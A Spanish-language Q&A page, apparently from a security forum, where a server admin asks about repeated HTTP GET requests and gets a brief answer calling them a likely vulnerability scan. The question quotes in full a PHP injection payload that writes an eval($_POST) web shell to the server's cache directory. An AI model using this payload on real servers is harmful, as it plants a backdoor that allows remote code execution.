Ejecución de funciones de PHP a través de la solicitud HTTP GET del pirata informático [duplicado]

Navega tus respuestas
0

Estamos recibiendo continuamente las siguientes solicitudes en nuestro servidor apache de los hackers 

?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);
@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1 200 42673

Por favor, ayúdanos a hacerme saber qué tipo de intento de piratería es este. no hay cache.php en el servidor, pero el pirata informático está recibiendo 200 HTTP Response .

hay alrededor de 200 solicitudes como esta. ¿Este ataque causará una grave amenaza de seguridad en el servidor?

Sería fantástico si alguien me explicara el significado de la función PHP utilizada en la solicitud anterior.

    
pregunta Pawan Patil 20.09.2017 - 06:32
fuente

1 respuesta

1

Esto está intentando restablecer algunas de las funciones de inicio de PHP. Principalmente activando errores en la pantalla, desactivando las citas mágicas (ayuda con SQLI) y escribiendo un archivo.

Están obteniendo 200 resp, ya que esto es solo una cadena de consulta, es decir, podría ser cualquier URL con esta consulta adjunta.

Lo más probable es que solo sea un escáner en busca de vulnerabilidades. Podría tomar medidas para bloquear la IP, el agente de usuario, etc.

    
respondido por el Trickycm 20.09.2017 - 10:30
fuente

Lea otras preguntas en las etiquetas

Administrador de contraseñas propio. Cómo almacenar contraseñas [cerrado] chkrootkit salida extraña DEBIAN 9 [cerrado]